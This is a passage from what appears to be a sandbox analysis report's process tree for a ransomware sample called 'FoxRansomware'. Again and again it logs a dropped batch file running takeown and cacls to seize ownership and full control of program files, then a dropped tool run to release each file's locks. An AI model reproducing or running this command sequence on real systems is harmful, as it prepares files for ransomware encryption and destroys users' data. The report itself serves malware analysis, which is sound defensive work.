    - Loads dropped DLL
    PID:2724
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "rss.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3924
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  2⤵
  PID:3540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    3⤵
    PID:3380
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3880
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  2⤵
  PID:3004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C
    3⤵
    PID:3076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"
    3⤵
    PID:3252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CourierStd-Oblique.otf" -nobanner
    3⤵
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CourierStd-Oblique.otf" -nobanner
      4⤵
      PID:3236
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3424
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
    3⤵
    - Modifies file permissions
    PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SY______.PFM" -nobanner
    3⤵
    PID:3148
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "SY______.PFM" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:3136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
    3⤵
    - Modifies file permissions
    PID:3288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
    3⤵
    PID:892
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
      4⤵
      PID:3712
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  2⤵
  PID:1468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"
    3⤵
    - Modifies file permissions
    PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can129.hsp" -nobanner
    3⤵
    PID:3360
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "can129.hsp" -nobanner
      4⤵
      PID:3320
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"
    3⤵
    - Modifies file permissions
    PID:4204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "icudt26l.dat" -nobanner
    3⤵
    PID:4220
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "icudt26l.dat" -nobanner
      4⤵
      PID:4212
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  2⤵
  PID:3772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
    3⤵
    PID:4300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ROMANIAN.TXT" -nobanner
    3⤵
    PID:4292
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "ROMANIAN.TXT" -nobanner
      4⤵
      PID:4284
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  2⤵
  PID:4252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
    3⤵
    PID:4364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
    3⤵
    - Modifies file permissions
    PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1258.TXT" -nobanner
    3⤵
    PID:4396
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CP1258.TXT" -nobanner
      4⤵
      PID:4256
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4424
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:4480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:4372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4472
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "background.png" -nobanner
      4⤵
      PID:4500
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:4556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:4596
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:4580
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:4644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:4672
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:4688
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  PID:4708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    PID:4768
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      PID:4800
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  PID:4812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:4724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    PID:4864
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      PID:4888
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  PID:4880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    - Modifies file permissions
    PID:4932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    PID:4840
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      PID:4852
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:4940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:5004
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:5036
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:4976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    - Modifies file permissions
    PID:5108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:5116
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:1904
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  PID:5076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    - Modifies file permissions
    PID:864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    PID:2848
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      PID:1488
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  PID:3720
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tl.gif" -nobanner
    3⤵
    PID:2660
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "tl.gif" -nobanner
      4⤵
      PID:2372
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:3368
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:1792
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:3172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:3488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:4056
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:1544
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  PID:1000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:3860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    PID:776
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:3800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    - Modifies file permissions
    PID:3816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt55.ths" -nobanner
    3⤵
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:912
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  PID:3848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    PID:1396
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      PID:1020
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  PID:3532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:348
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    PID:3916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    PID:3920
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\cmd.exe
